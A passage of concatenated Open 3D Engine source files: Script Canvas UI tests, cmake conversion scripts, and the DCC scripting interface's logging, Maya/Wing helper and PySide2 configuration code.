5.0) Report.result(Tests.relaunch_sc, sc_visible) # 7) Verify if test pane 1 retain its visibility editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") Report.result(Tests.visibility_retained, not find_pane(sc, TEST_PANE_1).isVisible()) # 8) Verify if location of test pane 2 is retained sc_main = sc.findChild(QtWidgets.QMainWindow) Report.result(Tests.location_retained, sc_main.dockWidgetArea(find_pane(sc_main, TEST_PANE_2)) == DOCKAREA) # 9) Verify if size of test pane 3 is retained test_pane_3 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_3) retained_size = test_pane_3.frameSize() retain_success = retained_size != initial_size Report.result(Tests.size_retained, retain_success) finally: # 10) Restore default layout and close SC window general.open_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 5.0) sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") click_menu_option(sc, "Restore Default Layout") sc.close() if __name__ == "__main__": import ImportPathHelper as imports imports.init() from utils import Report Report.start_test(Pane_Default_RetainOnSCRestart) ``` #### File: PythonTests/scripting/Pane_HappyPath_DocksProperly.py ```python class Tests(): pane_opened = ("Pane is opened successfully", "Failed to open pane") dock_pane = ("Pane is docked successfully", "Failed to dock Pane into one or more allowed area") # fmt: on def Pane_HappyPath_DocksProperly(): """ Summary: The Script Canvas window is opened to verify if Script canvas panes can be docked into every possible area of Script Canvas main window. (top, bottom, right and left sides of the window) Expected Behavior: The pane docks successfully. Test Steps: 1) Open Script Canvas window (Tools > Script Canvas) 2) Make sure Node Palette pane is opened 3) Dock the Node Palette pane into every possible area of main window 4) Restore default layout 5) Close Script Canvas window Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper import editor_python_test_tools.pyside_utils as pyside_utils # Open 3D Engine imports import azlmbr.legacy.general as general # Pyside imports from PySide2 import QtCore, QtWidgets from PySide2.QtCore import Qt PANE_WIDGET = "NodePalette" # Chosen most commonly used pane DOCKAREAS = [Qt.TopDockWidgetArea, Qt.BottomDockWidgetArea, Qt.RightDockWidgetArea, Qt.LeftDockWidgetArea] DOCKED = True def click_menu_option(window, option_text): action = pyside_utils.find_child_by_pattern(window, {"text": option_text, "type": QtWidgets.QAction}) action.trigger() def find_pane(window, pane_name): return window.findChild(QtWidgets.QDockWidget, pane_name) # Test starts here general.idle_enable(True) # 1) Open Script Canvas window (Tools > Script Canvas) general.open_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 5.0) # 2) Make sure Node Palette pane is opened editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") sc_main = sc.findChild(QtWidgets.QMainWindow) pane = find_pane(sc_main, PANE_WIDGET) if not pane.isVisible(): click_menu_option(sc, "Node Palette") pane = find_pane(sc_main, PANE_WIDGET) # New reference Report.result(Tests.pane_opened, pane.isVisible()) # 3) Dock the Node Palette pane into every possible area of main window for area in DOCKAREAS: sc_main.addDockWidget(area, find_pane(sc_main, PANE_WIDGET), QtCore.Qt.Vertical) if not (sc_main.dockWidgetArea(find_pane(sc_main, PANE_WIDGET)) == area): Report.info(f"Failed to dock into {str(area)}") DOCKED = DOCKED and (sc_main.dockWidgetArea(find_pane(sc_main, PANE_WIDGET)) == area) Report.result(Tests.dock_pane, DOCKED) # 4) Restore default layout # Need this step to restore to default in case of test failure click_menu_option(sc, "Restore Default Layout") # 5) Close Script Canvas window sc.close() if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(Pane_HappyPath_DocksProperly) ``` #### File: o3de/cmake/mocfix.py ```python from __future__ import (absolute_import, division, print_function, unicode_literals) import sys import json import os import re import subprocess import argparse mocre = re.compile(r'[\/<"](([^.\/<]*)\.moc)') alreadyFixedMocre = re.compile(r'[\/<"]moc_(([^.\/<]*)\.cpp)') includere = re.compile(r'^[\s]*#include[\s]?') qobjectre = re.compile(r'^[\s]*Q_OBJECT \/\/[\s]*AUTOMOC') qmocrun_start = '#if !defined(Q_MOC_RUN)' qmocrun_end = '#endif' header_extensions = ['.h', '.hxx'] def fixAutoMocHeader(input_file): try: with open(input_file, 'r') as source_file: print("Considering file {} for automoc fix".format(os.path.abspath(input_file))) fileLines = source_file.readlines() except (IOError, UnicodeDecodeError) as err: print('Error reading {}: {}'.format(input_file, err)) return for line_number in range(0, len(fileLines)): if fileLines[line_number].find(qmocrun_start) != -1: print("Already fixed file {}".format(os.path.abspath(input_file))) break reResult = qobjectre.search(fileLines[line_number]) if reResult: fixHFile(input_file) return def fixHFile(input_file): try: with open(input_file, 'r') as source_file: print("Considering file {} for header fix".format(os.path.abspath(input_file))) try: fileLines = source_file.readlines() except UnicodeDecodeError as err: print('Error reading file {}, err: {}'.format(input_file, err)) return first_include_line_number = -1 last_include_line_number = -1 for line_number in range(0, len(fileLines)): if fileLines[line_number].find(qmocrun_start) != -1: # Already injected Q_MOC_RUN guard print("Already fixed file {}".format(os.path.abspath(input_file))) break reResult = includere.search(fileLines[line_number]) if reResult: if first_include_line_number == -1: first_include_line_number = line_number last_include_line_number = line_number if first_include_line_number != -1 and last_include_line_number != -1: print('{}:{},{} Inserting Q_MOC_RUN'.format(os.path.abspath(input_file), first_include_line_number, last_include_line_number)) fileLines.insert(last_include_line_number+1, qmocrun_end + '\n') fileLines.insert(first_include_line_number, qmocrun_start +'\n') # p4 edit the file retProcess = subprocess.run(['p4', 'edit', input_file]) if retProcess.returncode != 0: print('Error opening {}: {}'.format(input_file, retProcess.returncode)) sys.exit(1) with open(input_file, 'w') as destination_file: destination_file.writelines(fileLines) except IOError as err: print('Error opening {}: {}'.format(input_file, err)) return def fixCppFile(input_file): # parse input file try: hasEdit = False with open(input_file, 'r') as source_file: print("Reading file " + os.path.abspath(input_file)) try: fileLines = source_file.readlines() except UnicodeDecodeError as err: print('Error reading file {}, err: {}'.format(input_file, err)) return for line_number in range(0, len(fileLines)): if alreadyFixedMocre.search(fileLines[line_number]): for h_extension in header_extensions: if os.path.exists(os.path.splitext(input_file)[0] + h_extension): fixHFile(os.path.splitext(input_file)[0] + h_extension) reResult = mocre.search(fileLines[line_number]) while reResult: # there is a match, we need to replace hasEdit = True # replace using the group newInclude = 'moc_' + reResult.group(2) + '.cpp' print('{}:{} Converting {} to {} '.format(os.path.abspath(input_file), line_number, reResult.group(1), newInclude)) fileLines[line_number] = fileLines[line_number].replace(reResult.group(1), newInclude) for h_extension in header_extensions: if os.path.exists(os.path.splitext(input_file)[0] + h_extension): fixHFile(os.path.splitext(input_file)[0] + h_extension) reResult = mocre.search(fileLines[line_number]) if hasEdit: # p4 edit the file retProcess = subprocess.run(['p4', 'edit', input_file]) if retProcess.returncode != 0: print('Error opening {}: {}'.format(input_file, retProcess.returncode)) sys.exit(1) with open(input_file, 'w') as destination_file: destination_file.writelines(fileLines) except IOError as err: print('Error opening {}: {}'.format(input_file, err)) return def fileMayRequireFixing(f): return os.path.splitext(f)[1].lower() == '.cpp' def main(): """script main function""" parser = argparse.ArgumentParser(description='This script converts includes of moc files from\n' '#include .*filename.moc -> #include .*moc_filename.cpp', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('file_or_dir', type=str, nargs='+', help='list of files or directories to search within for cpp files to fix up moc includes') args = parser.parse_args() for input_file in args.file_or_dir: if os.path.isdir(input_file): for dp, dn, filenames in os.walk(input_file): for f in filenames: extension = os.path.splitext(f)[1] extension_lower = extension.lower() if extension_lower == '.cpp': fixCppFile(os.path.join(dp, f)) elif extension_lower in header_extensions: fixAutoMocHeader(os.path.join(dp, f)) else: extension = os.path.splitext(input_file)[1] extension_lower = extension.lower() if extension_lower == '.cpp': fixCppFile(input_file) elif extension_lower in header_extensions: fixAutoMocHeader(input_file) #entrypoint if __name__ == '__main__': main() ``` #### File: o3de/cmake/waffiles2cmake.py ```python from __future__ import (absolute_import, division, print_function, unicode_literals) import sys import json import os import subprocess import argparse def get_banner(): return """# # Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution. # # SPDX-License-Identifier: Apache-2.0 OR MIT # # """ def convertFile(input_file): filename = os.path.basename(input_file) path = os.path.dirname(os.path.abspath(input_file)) outFilename = (os.path.splitext(filename)[0] + '_files.cmake').lower() output_file = os.path.join(path, outFilename) print('Converting ' + os.path.abspath(input_file) + ' to ' + output_file) # parse input file try: with open(input_file, 'r') as source_file: waf_files = json.load(source_file) except IOError: print('Error opening ' + input_file) sys.exit(1) except ValueError: print('Error parsing ' + input_file + ': invalid JSON!') sys.exit(1) files_list = [] for (i, j) in waf_files.items(): for (k, grp) in j.items(): for fname in grp: files_list.append(fname) alreadyExists = os.path.exists(output_file) if alreadyExists: subprocess.run(['p4', 'edit', output_file]) # build output file list try: fhandle = open(output_file, 'w+') fhandle.write(get_banner() + '\nset(FILES\n') for fname in files_list: fhandle.write(' ' + fname + '\n') fhandle.write(')\n') except IOError: print('Error creating ' + output_file) if not alreadyExists: subprocess.run(['p4', 'add', output_file]) def convertPath(input_path): for dp, dn, filenames in os.walk(input_path): for f in filenames: if os.path.splitext(f)[1] == '.waf_files': convertFile(os.path.join(dp, f)) def main(): """script main function""" parser = argparse.ArgumentParser(description='wafffiles2cmake.py (will recursively convert all waf_files)\n' 'output: [file_or_dir. ..].cmake\n', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('file_or_dir', type=str, nargs='+', help='list of files or directories to look for *.waf_files within and convert to cmake files') args = parser.parse_args() for input_file in args.file_or_dir: print(input_file) if os.path.splitext(input_file)[1] == '.waf_files': convertFile(input_file) elif os.path.isdir(input_file): for dp, dn, filenames in os.walk(input_file): for f in filenames: if os.path.splitext(f)[1] == '.waf_files': convertFile(os.path.join(dp, f)) #entrypoint if __name__ == '__main__': main() ``` #### File: DccScriptingInterface/azpy/__init__.py ```python __credits__ = ["<NAME>", "<NAME>"] __license__ = "EULA" __version__ = "0.0.1" __status__ = "Prototype" # -------------------------------------------------------------------------- # standard imports import sys import errno import os import os.path import site import re import logging as _logging # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- _ORG_TAG = 'Amazon_Lumberyard' _APP_TAG = 'DCCsi' _TOOL_TAG = 'azpy' _TYPE_TAG = 'module' _PACKAGENAME = _TOOL_TAG __all__ = ['config_utils', 'render', 'constants', 'return_stub', 'synthetic_env', 'env_base', 'env_bool', 'test', 'dev', 'lumberyard', 'marmoset'] # 'blender', 'maya', 'substance', 'houdini'] # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # _ROOT_LOGGER = _logging.getLogger() # only use this if debugging # https://stackoverflow.com/questions/56733085/how-to-know-the-current-file-path-after-being-frozen-into-an-executable-using-cx/56748839 #os.chdir(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))) # ------------------------------------------------------------------------- # global space # we need to set up basic access to the DCCsi _MODULE_PATH = os.path.realpath(__file__) # To Do: what if frozen? _DCCSIG_PATH = os.path.normpath(os.path.join(_MODULE_PATH, '../..')) _DCCSIG_PATH = os.getenv('DCCSIG_PATH', _DCCSIG_PATH) site.addsitedir(_DCCSIG_PATH) # azpy import azpy.return_stub as return_stub import azpy.env_bool as env_bool import azpy.constants as constants import azpy.config_utils as config_utils _G_DEBUG = env_bool.env_bool(constants.ENVAR_DCCSI_GDEBUG, False) _DCCSI_DEV_MODE = env_bool.env_bool(constants.ENVAR_DCCSI_DEV_MODE, False) # for py2.7 (Maya) we provide this, so we must assume some bootstrapping # has occured, see DccScriptingInterface\\config.py (_DCCSI_PYTHON_LIB_PATH) try: import pathlib except: import pathlib2 as pathlib from pathlib import Path if _G_DEBUG: print('DCCsi debug breadcrumb, pathlib is: {}'.format(pathlib)) # to be continued... # get/set the project name _LY_DEV = os.getenv(constants.ENVAR_LY_DEV, config_utils.get_stub_check_path(in_path=os.getcwd(), check_stub='engine.json')) # get/set the project name _LY_PROJECT_NAME = os.getenv(constants.ENVAR_LY_PROJECT, config_utils.get_current_project().name) # project cache log dir path _DCCSI_LOG_PATH = Path(os.getenv(constants.ENVAR_DCCSI_LOG_PATH, Path(_LY_DEV, _LY_PROJECT_NAME, 'Cache', 'pc', 'user', 'log', 'logs'))) for handler in _logging.root.handlers[:]: _logging.root.removeHandler(handler) # very basic root logger for early debugging, flip to while 1: while 0: _logging.basicConfig(level=_logging.DEBUG, format=constants.FRMT_LOG_LONG, datefmt='%m-%d %H:%M') _logging.debug('azpy.rootlogger> root logger set up for debugging') # root logger # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def makedirs(folder, *args, **kwargs): """a makedirs for py2.7 support""" try: return os.makedirs(folder, exist_ok=True, *args, **kwargs) except TypeError: # Unexpected arguments encountered pass try: # Should work is TypeError was caused by exist_ok, eg., Py2 return os.makedirs(folder, *args, **kwargs) except OSError as e: if e.errno != errno.EEXIST: raise if os.path.isfile(folder): # folder is a file, raise OSError just like os.makedirs() in Py3 raise # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- class FileExistsError(Exception): """Implements a stand-in Exception for py2.7""" def __init__(self, message, errors): # Call the base class constructor with the parameters it needs super(FileExistsError, self).__init__(message) # Now for your custom code... self.errors = errors if sys.version_info.major < 3: FileExistsError = FileExistsError # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def initialize_logger(name, log_to_file=False, default_log_level=_logging.NOTSET): """Start a azpy logger""" _logger = _logging.getLogger(name) _logger.propagate = False if not _logger.handlers: _log_level = int(os.getenv('DCCSI_LOGLEVEL', default_log_level)) if _G_DEBUG: _log_level = int(10) # force when debugging print('_log_level: {}'.format(_log_level)) if _log_level: ch = _logging.StreamHandler(sys.stdout) ch.setLevel(_log_level) formatter = _logging.Formatter(constants.FRMT_LOG_LONG) ch.setFormatter(formatter) _logger.addHandler(ch) _logger.setLevel(_log_level) else: _logger.addHandler(_logging.NullHandler()) # optionally add the log file handler (off by default) if log_to_file: _logger.info('DCCSI_LOG_PATH: {}'.format(_DCCSI_LOG_PATH)) try: # exist_ok, isn't available in py2.7 pathlib # because it doesn't exist for os.makedirs # pathlib2 backport used instead (see above) if sys.version_info.major >= 3: _DCCSI_LOG_PATH.mkdir(parents=True, exist_ok=True) else: makedirs(str(_DCCSI_LOG_PATH.resolve())) # py2.7 except FileExistsError: # except FileExistsError: doesn't exist in py2.7 _logger.debug("Folder is already there") else: _logger.debug("Folder was created") _log_filepath = Path(_DCCSI_LOG_PATH, '{}.log'.format(name)) try: _log_filepath.touch(mode=0o666, exist_ok=True) except FileExistsError: _logger.debug("Log file is already there: {}".format(_log_filepath)) else: _logger.debug("Log file was created: {}".format(_log_filepath)) if _log_filepath.exists(): file_formatter = _logging.Formatter(constants.FRMT_LOG_LONG) file_handler = _logging.FileHandler(str(_log_filepath)) file_handler.setLevel(_logging.DEBUG) file_handler.setFormatter(file_formatter) _logger.addHandler(file_handler) return _logger # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # set up logger with both console and file _logging if _G_DEBUG: _LOGGER = initialize_logger(_PACKAGENAME, log_to_file=True) else: _LOGGER = initialize_logger(_PACKAGENAME, log_to_file=False) _LOGGER.debug('Invoking __init__.py for {0}.'.format({_PACKAGENAME})) # some simple logger tests # evoke the filehandlers and test writting to the log file if _G_DEBUG: _LOGGER.info('Forced Info! for {0}.'.format({_PACKAGENAME})) _LOGGER.error('Forced ERROR! for {0}.'.format({_PACKAGENAME})) # debug breadcrumbs to check this module and used paths _LOGGER.debug('MODULE_PATH: {}'.format(_MODULE_PATH)) _LOGGER.debug('LY_DEV_PATH: {}'.format(_LY_DEV)) _LOGGER.debug('DCCSI_PATH: {}'.format(_DCCSIG_PATH)) _LOGGER.debug('LY_PROJECT_TAG: {}'.format(_LY_PROJECT_NAME)) _LOGGER.debug('DCCSI_LOG_PATH: {}'.format(_DCCSI_LOG_PATH)) # ------------------------------------------------------------------------- def test_imports(_all=__all__, _pkg=_PACKAGENAME, _logger=_LOGGER): # If in dev mode this will test imports of __all__ _logger.debug("~ Import triggered from: {0}".format(_pkg)) import importlib for pkgStr in _all: try: # this is py2.7 compatible # in py3.5+, we can use importlib.util instead importlib.import_module('.' + pkgStr, _pkg) _logger.debug("~ Imported module: {0}".format(pkgStr)) except Exception as e: _logger.warning('~ {0}'.format(e)) _logger.warning("~ {0} :: ImportFail".format(pkgStr)) return False return True # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- if _DCCSI_DEV_MODE: # If in dev mode this will test imports of __all__ _LOGGER.debug('Testing Imports: {0}'.format(_PACKAGENAME)) test_imports(__all__) # ------------------------------------------------------------------------- del _LOGGER ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == '__main__': _G_DEBUG = True _DCCSI_DEV_MODE = True if _G_DEBUG: print(_DCCSIG_PATH) test_imports() ``` #### File: maya/utils/execute_wing_code.py ```python import os import socket import logging as _logging # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def get_stub_check_path(in_path=__file__, check_stub='engineroot.txt'): ''' Returns the branch root directory of the dev\\'engineroot.txt' (... or you can pass it another known stub) so we can safely build relative filepaths within that branch. If the stub is not found, it returns None ''' path = os.path.abspath(os.path.join(os.path.dirname(in_path), "..")) _LOGGER.info('parent dir: {}'.format(path)) while 1: test_path = os.path.join(path, check_stub) if os.path.isfile(test_path): return os.path.abspath(os.path.join(os.path.dirname(test_path))) else: path, tail = (os.path.abspath(os.path.join(os.path.dirname(test_path), "..")), os.path.basename(test_path)) if (len(tail) == 0): return None # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # -- Global Definitions -- _MODULENAME = 'azpy.maya.utils.execute_wing_code' _LOGGER = _logging.getLogger(_MODULENAME) _LY_DEV = get_stub_check_path() _LOGGER.info('_LY_DEV: {}'.format(_LY_DEV)) _PROJ_CACHE = os.path.join(_LY_DEV, 'cache', 'DCCsi', 'wing') _LOGGER.info('_PROJ_CACHE: {}'.format(_PROJ_CACHE)) _LOCAL_HOST = socket.gethostbyname(socket.gethostname()) _LOGGER.info('local_host: {}'.format(_LOCAL_HOST)) # ------------------------------------------------------------------------- ########################################################################### # --main code block-------------------------------------------------------- def main(code_type='python'): """ Evaluate the temp file on disk, made by Wing, in Maya. code_type : string : Supports either 'python' or 'mel' """ temp_file_name = 'tmp_wing_data.txt' temp_file_path = os.path.join(_PROJ_CACHE, temp_file_name) temp_file_path = os.path.abspath(temp_file_path) temp_file = temp_file_path.replace("\\", "/") # maya is linux paths? _LOGGER.debug('temp_file_path is: {}'.format(temp_file_path)) if os.access(temp_file, os.F_OK): # open and print the file in Maya: f = open(temp_file, "r") lines = f.readlines() for line in lines: print(line.rstrip()) f.close() if code_type == "python": # execute the file contents in Maya: f = open(temp_file, "r") # (1) doesn't work? #exec(f, __main__.__dict__, __main__.__dict__) # (2) works is series of single expressions #for line in lines: #exec(line.rstrip()) # f.close() # (3) this seems to work much better temp_code_file_name = 'temp_code.py' temp_code_file = os.path.join(_PROJ_CACHE, temp_code_file_name) temp_code_file = os.path.abspath(temp_code_file) temp_code = temp_file_path.replace("\\", "/") # maya is linux paths? code = compile(f.read(), temp_code, 'exec') _LOGGER.debug(type(code)) exec(code) elif code_type == "mel": mel_cmd = "source '{}'".format(temp_file) # This causes the "// Result: " line to show up in the Script Editor: om.MGlobal.executeCommand(mel_cmd, True, True) else: _LOGGER.warning("No temp file exists: {}".format(temp_file)) file=open(temp_file, "w") file.write("test file write") if os.path.isfile(temp_file): _LOGGER.info('Created the temp file, please try again!') else: _LOGGER.error('File not created: {}'.format(temp_file)) return # ------------------------------------------------------------------------- ``` #### File: DccScriptingInterface/azpy/return_stub.py ```python import os import sys import logging as _logging # -------------------------------------------------------------------------- # ------------------------------------------------------------------------- # global space debug flag, no fancy stuff here we use in bootstrap _G_DEBUG = False # manually enable to debug this file _PACKAGENAME = __name__ if _PACKAGENAME is '__main__': _PACKAGENAME = 'azpy.return_stub' _LOGGER = _logging.getLogger(_PACKAGENAME) _LOGGER.debug('Initializing: {0}.'.format({_PACKAGENAME})) __all__ = ['return_stub'] # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def return_stub(stub): _dir_to_last_file = None '''Take a file name (stub) and returns the directory of the file (stub)''' if _dir_to_last_file is None: path = os.path.abspath(__file__) while 1: path, tail = os.path.split(path) if (os.path.isfile(os.path.join(path, stub))): break if (len(tail) == 0): path = "" if _G_DEBUG: _LOGGER.debug('~ Debug Message: I was not able to find the ' 'path to that file (stub) in a walk-up ' 'from currnet path') break _dir_to_last_file = path return _dir_to_last_file # -------------------------------------------------------------------------- ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == '__main__': # there are not really tests to run here due to this being a list of # constants for shared use. # happy print _LOGGER.info("# {0} #".format('-' * 72)) _LOGGER.info('~ find_stub.py ... Running script as __main__') _LOGGER.info("# {0} #\r".format('-' * 72)) _LOGGER.info('~ Current Work dir: {0}'.format(os.getcwd())) _LOGGER.info('~ Dev\: {0}'.format(return_stub('engineroot.txt'))) # custom prompt sys.ps1 = "[azpy]>>" ``` #### File: TechnicalArt/DccScriptingInterface/config.py ```python import os import sys import site import re # 3rdParty (possibly) py3 ships with pathlib, 2.7 does not # import pathlib # our framework for dcc tools need to run in apps like Maya that may still be # on py27 so we need to import and use after some boostrapping # -------------------------------------------------------------------+------ #os.environ['PYTHONINSPECT'] = 'True' _MODULE_PATH = os.path.abspath(__file__) # we don't have access yet to the DCCsi Lib\site-packages # (1) this will give us import access to azpy (always?) _DCCSIG_PATH = os.getenv('DCCSIG_PATH', os.path.abspath(os.path.dirname(_MODULE_PATH))) # ^ we assume this config is in the root of the DCCsi # if it's not, be sure to set envar 'DCCSIG_PATH' to ensure it site.addsitedir(_DCCSIG_PATH) # PYTHONPATH # now we have azpy api access import azpy from azpy.env_bool import env_bool from azpy.constants import ENVAR_DCCSI_GDEBUG from azpy.constants import ENVAR_DCCSI_DEV_MODE # set up global space, logging etc. # set these true if you want them set globally for debugging _DCCSI_GDEBUG = env_bool(ENVAR_DCCSI_GDEBUG, False) _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, False) _PACKAGENAME = 'DCCsi.config' _LOG_LEVEL = int(20) if _DCCSI_GDEBUG: _LOG_LEVEL = int(10) _LOGGER = azpy.initialize_logger(_PACKAGENAME, log_to_file=False, default_log_level=_LOG_LEVEL) _LOGGER.info('Starting up: {}.'.format({_PACKAGENAME})) _LOGGER.info('site.addsitedir({})'.format(_DCCSIG_PATH)) _LOGGER.debug('_DCCSI_GDEBUG: {}'.format(_DCCSI_GDEBUG)) _LOGGER.debug('_DCCSI_DEV_MODE: {}'.format(_DCCSI_DEV_MODE)) # early attach WingIDE debugger (can refactor to include other IDEs later) if _DCCSI_DEV_MODE: from azpy.test.entry_test import connect_wing foo = connect_wing() # to do: ^ this should be replaced with full featured azpy.dev.util # that supports additional debuggers (pycharm, vscode, etc.) # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # (2) this will give us import access to modules we provide _DCCSI_PYTHON_LIB_PATH = azpy.config_utils.bootstrap_dccsi_py_libs(_DCCSIG_PATH) # Now we should be able to just carry on with pth lib and dynaconf from dynaconf import Dynaconf try: import pathlib except: import pathlib2 as pathlib from pathlib import Path _DCCSIG_PATH = Path(_DCCSIG_PATH).resolve() _DCCSI_PYTHON_LIB_PATH = Path(_DCCSI_PYTHON_LIB_PATH).resolve() # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def init_ly_pyside(LY_DEV=None): """sets access to lumberyards Qt dlls and PySide""" LY_DEV = Path(LY_DEV).resolve() if not LY_DEV.exists(): raise Exception('LY_DEV does NOT exist: {0}'.format(LY_DEV)) else: # to do: 'windows_vs2019' might change or be different locally # 'windows_vs2019' is defined as a str tag in constants # we may not yet have access to azpy.constants :( from azpy.constants import TAG_DIR_LY_BUILD from azpy.constants import PATH_LY_BUILD_PATH from azpy.constants import PATH_LY_BIN_PATH # to do: pull some of these str and tags from constants LY_BUILD_PATH = Path.joinpath(LY_DEV, TAG_DIR_LY_BUILD).resolve() LY_BIN_PATH = Path.joinpath(LY_BUILD_PATH, 'bin', 'profile').resolve() # # allows to retreive from settings.QTFORPYTHON_PATH # from azpy.constants import STR_QTFORPYTHON_PATH # a path string constructor # QTFORPYTHON_PATH = Path(STR_QTFORPYTHON_PATH.format(LY_DEV)).resolve() # os.environ["DYNACONF_QTFORPYTHON_PATH"] = str(QTFORPYTHON_PATH) # site.addsitedir(str(QTFORPYTHON_PATH)) # PYTHONPATH QT_PLUGIN_PATH = Path.joinpath(LY_BIN_PATH, 'EditorPlugins').resolve() os.environ["DYNACONF_QT_PLUGIN_PATH"] = str(QT_PLUGIN_PATH) os.environ['PATH'] = QT_PLUGIN_PATH.as_posix() + os.pathsep + os.environ['PATH'] QT_QPA_PLATFORM_PLUGIN_PATH = Path.joinpath(QT_PLUGIN_PATH, 'platforms').resolve() os.environ["DYNACONF_QT_QPA_PLATFORM_PLUGIN_PATH"] = str(QT_QPA_PLATFORM_PLUGIN_PATH) # if the line below is removed external standalone apps can't load PySide2 os.environ["QT_QPA_PLATFORM_PLUGIN_PATH"] = str(QT_QPA_PLATFORM_PLUGIN_PATH) # ^^ bypass trying to set only with DYNACONF environment os.environ['PATH'] = QT_QPA_PLATFORM_PLUGIN_PATH.as_posix() + os.pathsep + os.environ['PATH'] # ^^ this particular env only works correctly if put on the PATH in this manner # add Qt binaries to the Windows path to handle findings DLL file dependencies if sys.platform.startswith('win'): # path = os.environ['PATH'] # newPath = '' # newPath += str(LY_BIN_PATH) + os.pathsep # newPath += str(Path.joinpath(QTFORPYTHON_PATH, # 'shiboken2').resolve()) + os.pathsep # newPath += str(Path.joinpath(QTFORPYTHON_PATH, # 'PySide2').resolve()) + os.pathsep # newPath += path # os.environ['PATH']=newPath _LOGGER.debug('PySide2 bootstrapped PATH for Windows.') try: import PySide2 _LOGGER.debug('DCCsi, config.py: SUCCESS: import PySide2') _LOGGER.debug(PySide2) status = True except ImportError as e: _LOGGER.debug('DCCsi, config.py: FAILURE: import PySide2') status = False raise(e) try: import shiboken2 _LOGGER.debug('DCCsi, config.py: SUCCESS: import shiboken2') _LOGGER.debug(shiboken2) status = True except ImportError as e: _LOGGER.debug('DCCsi, config.py: FAILURE: import shiboken2') status = False raise(e) # set up the pyside2-tools (pyside2uic) # to do: move path construction string to constants and build off of SDK # have not done that yet as I really want to get legal approval and # add this to the QtForPython Gem # please pass this on the current code review DCCSI_PYSIDE2_TOOLS = Path.joinpath(LY_DEV, 'Gems', 'AtomLyIntegration', 'TechnicalArt', 'DccScriptingInterface', '.dev', 'QtForPython', 'pyside2-tools-dev') os.environ["DYNACONF_DCCSI_PYSIDE2_TOOLS"] = str(DCCSI_PYSIDE2_TOOLS.resolve()) os.environ['PATH'] = DCCSI_PYSIDE2_TOOLS.as_posix() + os.pathsep + os.environ['PATH'] return status # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def test_pyside2(): """Convenience method to test Qt / PySide2 access""" # now test _LOGGER.info('Testing Qt / PySide2') try: from PySide2.QtWidgets import QApplication, QPushButton app = QApplication(sys.argv) hello = QPushButton("Hello world!") hello.resize(200, 60) hello.show() except Exception as e: _LOGGER.error('FAILURE: Qt / PySide2') status = False raise(e) _LOGGER.info('SUCCESS: .test_pyside2()') sys.exit(app.exec_()) # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # `envvar_prefix` = export envvars with `export DYNACONF_FOO=bar`. # `settings_files` = Load this files in the order. # here we are modifying or adding to the dynamic config settings on import settings = Dynaconf( envvar_prefix="DYNACONF", settings_files=['settings.json', '.secrets.json'], ) from azpy.constants import PATH_LY_BUILD_PATH from azpy.constants import PATH_LY_BIN_PATH # global settings os.environ["DYNACONF_DCCSI_GDEBUG"] = str(_DCCSI_GDEBUG) os.environ["DYNACONF_DCCSI_DEV_MODE"] = str(_DCCSI_DEV_MODE) # search up to get \dev _LY_DEV = azpy.config_utils.get_stub_check_path(in_path=_DCCSIG_PATH, check_stub='engine.json') os.environ["DYNACONF_LY_DEV"] = str(_LY_DEV.resolve()) _LY_PROJECT = azpy.config_utils.get_current_project() os.environ["DYNACONF_LY_PROJECT"] = str(_LY_PROJECT.resolve()) _LY_PROJECT_PATH = Path(_LY_DEV, _LY_PROJECT) os.environ["DYNACONF_LY_PROJECT_PATH"] = str(_LY_PROJECT_PATH) os.environ["DYNACONF_DCCSIG_PATH"] = str(_DCCSIG_PATH) _DCCSI_CONFIG_PATH = Path(_MODULE_PATH).resolve() os.environ["DYNACONF_DCCSI_CONFIG_PATH"] = str(_DCCSI_CONFIG_PATH) _DCCSIG_SDK_PATH = Path.joinpath(_DCCSIG_PATH, 'SDK').resolve() os.environ["DYNACONF_DCCSIG_SDK_PATH"] = str(_DCCSIG_SDK_PATH) os.environ["DYNACONF_DCCSI_PYTHON_LIB_PATH"] = str(_DCCSI_PYTHON_LIB_PATH) os.environ["DYNACONF_OS_FOLDER"] = azpy.config_utils.get_os() # we need to set up the Ly dev build \bin\path (for Qt dll access) _LY_BUILD_PATH = Path(PATH_LY_BUILD_PATH).resolve() os.environ["DYNACONF_LY_BUILD_PATH"] = str(_LY_BUILD_PATH) _LY_BIN_PATH = Path(PATH_LY_BIN_PATH).resolve() os.environ["DYNACONF_LY_BIN_PATH"] = str(_LY_BIN_PATH) # project cache log dir path from azpy.constants import ENVAR_DCCSI_LOG_PATH from azpy.constants import PATH_DCCSI_LOG_PATH _DCCSI_LOG_PATH = Path(os.getenv(ENVAR_DCCSI_LOG_PATH, 